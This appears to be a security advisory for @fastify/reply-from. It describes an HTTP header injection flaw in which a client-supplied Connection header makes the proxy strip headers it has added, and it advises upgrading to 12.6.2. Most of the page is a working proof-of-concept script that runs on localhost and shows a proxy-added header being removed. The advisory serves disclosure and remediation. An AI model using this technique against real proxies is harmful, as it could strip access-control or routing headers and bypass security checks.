Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Upgrade @fastify/reply-from to version 12.6.2 or higher.
@fastify/reply-from is a Fastify plugin that forwards your HTTP request to another server.
Affected versions of this package are vulnerable to HTTP Header Injection via improper handling of the Connection header after proxy-added headers have been set. An attacker can remove headers intended for routing, access control, or security by specifying them in the Connection header value, causing the proxy to strip these headers from upstream requests.
// Fastify is used for both the upstream echo server and the proxy in front of it.
const fastify = require('fastify');
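/**
 * Reproduces the Connection-header stripping issue end to end.
 *
 * Starts an upstream Fastify server that echoes the headers it receives,
 * fronts it with a @fastify/reply-from proxy that adds `x-forwarded-by`
 * through `rewriteRequestHeaders`, then sends two requests through the
 * proxy: a baseline request and one carrying `Connection: x-forwarded-by`.
 * The two log lines show whether the proxy-added header reached the upstream.
 *
 * Ports 19800 (proxy) and 19801 (upstream) must be free on localhost.
 * Both servers are closed even if a step throws, so the process does not
 * stay alive on open listeners after a failure.
 *
 * @returns {Promise<void>}
 * @throws {Error} on listen/register failures, or if a response body is not JSON.
 */
async function test() {
  // Upstream service that echoes headers, so the proxy's outgoing header
  // set can be inspected from the response body.
  const upstream = fastify({ logger: false });
  upstream.get('/api/echo-headers', async (request) => {
    return { headers: request.headers };
  });

  // Proxy that adds a custom header via rewriteRequestHeaders.
  const proxy = fastify({ logger: false });

  try {
    await upstream.listen({ port: 19801 });

    await proxy.register(require('@fastify/reply-from'), {
      base: 'http://localhost:19801',
    });
    proxy.get('/proxy/*', async (request, reply) => {
      const target = `/${request.params['*'] ?? ''}`;
      return reply.from(target, {
        // The header the proxy relies on downstream; its presence at the
        // upstream is what the two requests below compare.
        rewriteRequestHeaders: (originalReq, headers) => {
          return { ...headers, 'x-forwarded-by': 'fastify-proxy' };
        },
      });
    });
    await proxy.listen({ port: 19800 });

    // Baseline: proxy adds x-forwarded-by header.
    const res1 = await proxy.inject({
      method: 'GET',
      url: '/proxy/api/echo-headers',
    });
    console.log('Baseline response headers from upstream:');
    const body1 = JSON.parse(res1.body);
    console.log(' x-forwarded-by:', body1.headers['x-forwarded-by'] || 'NOT PRESENT');

    // Attack: a client-supplied Connection header names the proxy-added
    // header; affected versions drop it from the upstream request.
    const res2 = await proxy.inject({
      method: 'GET',
      url: '/proxy/api/echo-headers',
      headers: { connection: 'x-forwarded-by' },
    });
    console.log('\nAttack response headers from upstream:');
    const body2 = JSON.parse(res2.body);
    console.log(' x-forwarded-by:', body2.headers['x-forwarded-by'] || 'NOT PRESENT (stripped!)');
  } finally {
    // Close both servers regardless of how the steps above ended; the
    // nested finally guarantees the upstream closes even if the proxy
    // close rejects.
    try {
      await proxy.close();
    } finally {
      await upstream.close();
    }
  }
}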
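// Do not leave the promise floating: report any rejection (for example a
// port already in use) and signal failure through the exit code.
test().catch((err) => {
  console.error(err);
  process.exitCode = 1;
});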